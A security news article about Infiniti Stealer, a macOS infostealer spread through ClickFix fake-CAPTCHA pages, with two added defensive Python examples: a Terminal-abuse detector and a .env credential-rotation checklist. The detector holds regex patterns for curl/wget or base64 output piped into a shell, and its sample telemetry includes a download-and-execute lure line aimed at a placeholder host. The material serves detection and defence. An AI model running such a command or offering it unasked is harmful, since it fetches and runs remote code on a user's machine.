
For years, many Mac users have lived with the idea that macOS was almost immune to malware. It was never entirely true, but its smaller market share compared to Windows meant many cybercriminals looked the other way. That period of relative calm is coming to an end, and the emergence of Infiniti Stealer makes that quite clear.
This new malicious code is designed to steal sensitive information from Mac computers. Using social engineering techniques that bear little resemblance to the viruses of yesteryear, Infiniti Stealer can steal passwords, personal data, and even cryptocurrency wallets without the user noticing anything unusual. Fake verification pages, automated scripts, and evasion mechanisms keep the user unaware that anything is amiss.
The end of the false sense of security on macOS
For a long time, the Mac community took it for granted that virus problems were a Windows issue. Part of that confidence came from macOS's own security design, but part came from a more practical reason: there were fewer users, and therefore less interest from attackers.
That reality has completely changed. Apple has been gaining ground in the European market, especially among professionals, freelancers and companies, and that has made Mac computers a very attractive target. Sectors such as design, software development, finance, and digital marketing work daily with high-value information.
Meanwhile, security researchers have been detecting a significant increase in infostealer-type malware on macOS. This type of threat focuses on stealing credentials, session cookies, card data, and cryptocurrency assets in order to convert them into cash quickly.
Furthermore, modern Mac malware is no longer limited to basic tricks. It is increasingly common to see techniques such as fileless execution, the use of AppleScript, and the abuse of native system tools to remain undetected. All of this allows infections to stay active for weeks or months without raising suspicion.
Infiniti Stealer: the new infostealer specializing in Macs
In this context, Infiniti Stealer bursts onto the scene: a malware specifically designed for macOS and focused on data theft. The threat has been analyzed in detail by researchers at Malwarebytes Labs, who have identified a very specific attack pattern.
Infiniti Stealer combines two key elements: on the one hand, the distribution technique known as ClickFix, already used on Windows and now adapted to the Apple ecosystem; on the other, a malicious payload written in Python and compiled with Nuitka, which produces a native Mac binary that is difficult to detect.
One of the most worrying aspects is that it does not rely on complex technical vulnerabilities, but rather on deceiving the user. The campaign relies on pages that appear to be legitimate verification systems, similar to the well-known CAPTCHAs or Cloudflare checks, which helps lower users' guard.
Malwarebytes highlights that Infiniti Stealer demonstrates how strategies that worked on Windows are migrating to macOS. This is a clear sign that criminals no longer consider Apple's system a low-risk target, especially in Europe, where Mac adoption in professional environments continues to grow.
The ClickFix trap and fake CAPTCHAs
The heart of the attack lies in the ClickFix technique applied to supposed human verifications. The process begins when the user arrives at a malicious page that impersonates a security check: at first glance, it looks like a simple test to confirm that the visitor is not a bot.
Instead of asking the user to tick boxes or identify images, the page displays a message asking them to copy and paste a command into the macOS Terminal, under the pretext that this is an additional verification step required to proceed. Everything is presented in a fairly convincing way, so it is easy for more than one person to fall into the trap.
That supposed verification command is, in reality, malicious code that downloads and executes the Infiniti Stealer payload. Once pasted into the Terminal and executed, the system starts downloading the necessary files, usually using standard tools such as curl or bash scripts.
Experts remind us that no legitimate CAPTCHA or Cloudflare check requires copying and pasting commands from a website into the Terminal. That simple detail should be enough to set off every alarm, but the combination of haste and confidence in macOS security means that many users do not question it.
From command to data theft: this is how Infiniti Stealer operates
Once the user executes the command provided by the fake verification, a fairly structured chain of actions is set in motion. First, a payload is downloaded that produces a native binary of around 8.6 MB, designed to work independently on macOS without relying on external components.
That binary runs in the background, avoiding visible windows or notifications so as not to raise suspicion. From that moment on, the computer appears to function normally, but the malware begins to track and collect information.
Among the main targets are Chromium- and Firefox-based browsers, which store a large amount of credentials, cookies, and autofill data. It also targets the macOS keychain, where passwords, certificates, and other sensitive secrets are stored.
Additionally, Infiniti Stealer can capture active session tokens and valid cookies. This allows attackers to access online accounts without needing to enter a username and password, even bypassing two-step authentication when the session is already open.
In the case of advanced users and businesses, the malware pays special attention to files such as .env and other configuration files. These files often contain API keys, database credentials, and cloud service access data, which makes developers and administrators a particularly attractive target.
Technical capabilities and information exfiltration
From a technical perspective, Infiniti Stealer stands out for combining a native macOS approach with evasion techniques. Generating a custom binary complicates the work of some security solutions that focus on scripts or on better-known behaviors.
The malware is capable of extracting data from a wide range of browsers, covering a very significant share of real-world usage in Europe. Added to this is access to the certificates already stored in the macOS keychain, a critical source of information for accessing professional services.
Once collected, the stolen data is sent to servers controlled by the attackers over encrypted connections. This use of secure channels makes it harder for traditional tools to detect the exfiltration, as the traffic blends in with other legitimate communications.
In some scenarios, the combination of credentials, tokens, and API keys allows attackers to pivot from a single compromised Mac to entire enterprise infrastructures: code repositories, administration panels, and even financial services linked to the affected computer.
A change of focus: Mac is no longer a minor target
Cases like Infiniti Stealer confirm something security analysts have been warning about for some time: macOS is no longer a secondary target. The growing number of users and the presence of Macs in key departments make the potential profit for criminals very high.
In Europe and Spain, the use of Macs has become widespread in consultancies, creative studios, fintechs, technology startups and professional offices. In all these environments, confidential documents, access to corporate platforms, and bank accounts are handled.
The expansion of cryptocurrencies and digital financial services has added another incentive. Many users keep wallets, seed phrases, and exchange logins on their computers, which fits perfectly with the type of information an infostealer is looking for.
At the same time, the macOS development ecosystem is enormous. Programming tools, package managers, and cloud deployment platforms are used daily from Mac computers, so compromising a single laptop can open the door to an entire infrastructure.
What can Mac users do to protect themselves?
Although Infiniti Stealer is a serious threat, several measures can significantly reduce the risk. The first, and perhaps most important, is never to run commands in the Terminal if you do not fully understand what they do, especially when they come from a website.
Any site that asks you to copy and paste text into the Terminal as part of a supposed security check should be considered highly suspicious. Legitimate CAPTCHAs do not require this type of manual action, neither in Spain nor in any other country.
It is also advisable to take extra care when downloading software or using unknown services. Whenever possible, use official sources, verified app stores, and trusted providers.
On a technical level, it can be useful to supplement macOS's built-in protections with specialized security solutions that monitor anomalous behavior, including Terminal activity and the appearance of new binaries in sensitive locations.
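As an added example that is not part of the article or of Malwarebytes' analysis, the following Python script shows the kind of behavioural check such a monitoring tool would implement. It runs over a few constructed process and file-creation events, flags a command spawned from a Terminal app that pipes downloaded content straight into a shell (the ClickFix pattern described in the previous section), and correlates that with a new executable appearing in a temporary directory shortly afterwards. The event format, field names, hostnames and paths are all assumptions made for the example.

```python
"""Behavioural detector for ClickFix-style Terminal abuse on macOS.

Added example, not code from the article or from Malwarebytes. Event shape,
parent-process names and sample lines are constructed to resemble what an
endpoint agent might emit; adapt the field mapping to your own telemetry.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Pipelines that fetch remote content and hand it straight to a shell.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Inline-decoded content piped into a shell (hides what is run from a casual reader).
DECODE_EXEC = re.compile(r"\bbase64\b[^|]*(-d|--decode)[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")

TERMINAL_APPS = {"Terminal", "iTerm2"}                   # where a pasted lure command runs
DROP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/")  # user-writable staging dirs
CORRELATION_WINDOW = 120                                 # seconds between lure and dropped binary


@dataclass
class Event:
    ts: int                   # seconds since epoch (constructed values below)
    kind: str                 # "exec" or "file_create"
    parent: str               # parent process name for exec events, "" otherwise
    target: str               # command line (exec) or file path (file_create)
    executable: bool = False  # file_create only: file was created with an exec bit


def classify_command(cmd: str) -> List[str]:
    """Return the names of every download-and-run pattern a command line matches."""
    hits = []
    if DOWNLOAD_EXEC.search(cmd):
        hits.append("download_and_execute")
    if DECODE_EXEC.search(cmd):
        hits.append("decode_and_execute")
    return hits


def detect(events: Iterable[Event]) -> List[Tuple[int, str, str]]:
    """Walk events in time order and return (ts, rule, detail) alerts."""
    alerts = []
    last_lure_ts = None
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "exec":
            hits = classify_command(ev.target)
            if not hits:
                continue
            # A matching one-liner whose parent is a Terminal app is the ClickFix
            # shape exactly; the same pipeline from another parent is still worth an alert.
            rule = "clickfix_terminal_paste" if ev.parent in TERMINAL_APPS else "download_exec_other_parent"
            alerts.append((ev.ts, rule, ",".join(hits) + ": " + ev.target))
            last_lure_ts = ev.ts
        elif ev.kind == "file_create" and ev.executable:
            # A fresh executable in a staging directory is only interesting when it
            # closely follows a lure command; on its own it is normal developer noise.
            if (ev.target.startswith(DROP_DIRS) and last_lure_ts is not None
                    and ev.ts - last_lure_ts <= CORRELATION_WINDOW):
                alerts.append((ev.ts, "dropped_binary_after_lure", ev.target))
    return alerts


# Constructed sample telemetry (not real data): a benign session plus one lure.
SAMPLE_EVENTS = [
    Event(100, "exec", "Terminal", "ls -la ~/Documents"),
    Event(105, "exec", "Terminal", "curl -O https://downloads.example.invalid/tool.tar.gz"),
    Event(110, "exec", "Terminal", "curl -fsSL https://verify.example.invalid/check.sh | bash"),
    Event(140, "file_create", "", "/tmp/.verify/checker", executable=True),
    Event(600, "file_create", "", "/tmp/build/mytool", executable=True),
    Event(700, "exec", "osascript", "echo aGVsbG8= | base64 -d | sh"),
]


if __name__ == "__main__":
    for ts, rule, detail in detect(SAMPLE_EVENTS):
        print(f"t={ts:<4} {rule:<28} {detail}")
```

The plain download at t=105 and the build artefact at t=600 produce no alert: the download is never executed, and the later binary is outside the correlation window. Correlating the dropped file with a preceding lure command is what keeps this rule quiet on a developer workstation where executables appear in temporary directories all day.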
Steps to take if an Infiniti Stealer infection is suspected
If there is reasonable doubt that you executed one of these commands or visited a suspicious verification page, it is important to act calmly but quickly. Researchers recommend that you stop using the computer for sensitive activities such as online banking, corporate email, or cryptocurrency management.
Next, change your passwords from another, clean device. Prioritize your primary email, banking apps, work services, and Apple ID. It is also a good idea to review your open sessions and close any that are not needed.
In business environments, it may be necessary to inform the IT department or the security officer so they can check for unusual access, changes to repositories, or strange activity in corporate accounts.
According to experts, the key is to assume that, after an infection of this type, the credentials stored on the device should be considered compromised. Hence the importance of revoking them, rotating them, and reviewing access logs on all important services.
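Rotating "every credential stored on the device" is only practical if you first know which ones exist, and the .env and configuration files mentioned earlier are where developers tend to accumulate them. The following Python script is an added example, not part of the article: it parses .env-style files (export prefixes, quoted and bare values, inline comments), picks out the variables that look like secrets by name or by an embedded user:password URL, and produces a rotation checklist with the values masked so the list can be handed to a security team without re-exposing anything. The file paths, variable names and values are constructed for the example.

```python
"""Build a credential-rotation checklist from .env-style files.

Added example, not code from the article. Parsing follows common dotenv
conventions: optional "export ", single or double quoted values, and an
inline comment that starts with "#" preceded by whitespace. Sample files
below are constructed and contain no real credentials.
"""
import re
from typing import Dict, List, Tuple

# Name fragments that usually denote a credential.
SECRET_HINTS = ("KEY", "SECRET", "TOKEN", "PASSWORD", "PASSWD", "PRIVATE", "CREDENTIAL")
# URL-style values that embed a password, e.g. scheme://user:pass@host/db
URL_WITH_CREDS = re.compile(r"^[a-z][a-z0-9+.-]*://[^/@:\s]+:[^@\s]+@", re.IGNORECASE)
KEY_RE = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=(.*)$")


def _split_value(rest: str) -> str:
    """Strip quotes or an inline comment from the right-hand side of KEY=..."""
    rest = rest.strip()
    if rest[:1] in ("'", '"'):
        end = rest.find(rest[0], 1)
        if end != -1:
            return rest[1:end]
    m = re.search(r"\s#", rest)   # "#" only starts a comment after whitespace
    if m:
        rest = rest[:m.start()]
    return rest.strip()


def parse_env(text: str) -> Dict[str, str]:
    """Parse .env content into an ordered {KEY: value} mapping."""
    env: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.match(line)
        if m:
            env[m.group(1)] = _split_value(m.group(2))
    return env


def is_secret(key: str, value: str) -> bool:
    """Secret by name (API_KEY, *_TOKEN, ...) or by a user:password@ URL value."""
    upper = key.upper()
    if any(hint in upper for hint in SECRET_HINTS):
        return True
    return bool(URL_WITH_CREDS.match(value))


def mask(value: str) -> str:
    """Show only the length so the checklist itself never carries the secret."""
    return f"<{len(value)} chars>"


def rotation_checklist(files: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (file, key, masked_value) for every secret-looking variable."""
    items = []
    for path, text in files.items():
        for key, value in parse_env(text).items():
            if is_secret(key, value):
                items.append((path, key, mask(value)))
    return items


# Constructed sample files (paths and values invented for the example).
SAMPLE_FILES = {
    "~/projects/shop/.env": """\
# Constructed sample, not a real configuration
APP_ENV=production
export STRIPE_API_KEY="sk_test_EXAMPLE0000000000"
DATABASE_URL=postgres://shop:s3cretpass@db.example.invalid:5432/shop
DB_PASSWORD=hunter22 # rotate after incident
SMTP_HOST=mail.example.invalid
THEME_COLOR=#336699
""",
    "~/projects/infra/.env": """\
AWS_SECRET_ACCESS_KEY='wJalrXUtnFEMI/EXAMPLE/KEY'
AWS_REGION=eu-west-1
""",
}


if __name__ == "__main__":
    for path, key, masked in rotation_checklist(SAMPLE_FILES):
        print(f"[ ] rotate {key:<24} {masked:<12} in {path}")
```

Note that DATABASE_URL is listed even though nothing in its name suggests a secret: the password lives inside the connection string, which is exactly the kind of credential that gets overlooked during a rushed rotation. THEME_COLOR is correctly kept, because a bare # not preceded by whitespace is part of the value rather than a comment.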
Everything surrounding Infiniti Stealer reinforces one clear idea: macOS remains a robust system, but it no longer exists in a bubble isolated from malware. The rise of infostealers targeting Mac users in Europe demonstrates that attackers have found these machines to be a highly valuable source of data. Understanding how techniques like ClickFix work, being wary of any verification that requires using Terminal, and strengthening everyday security habits have become essential to keeping passwords, online accounts, and digital assets safe on Apple computers.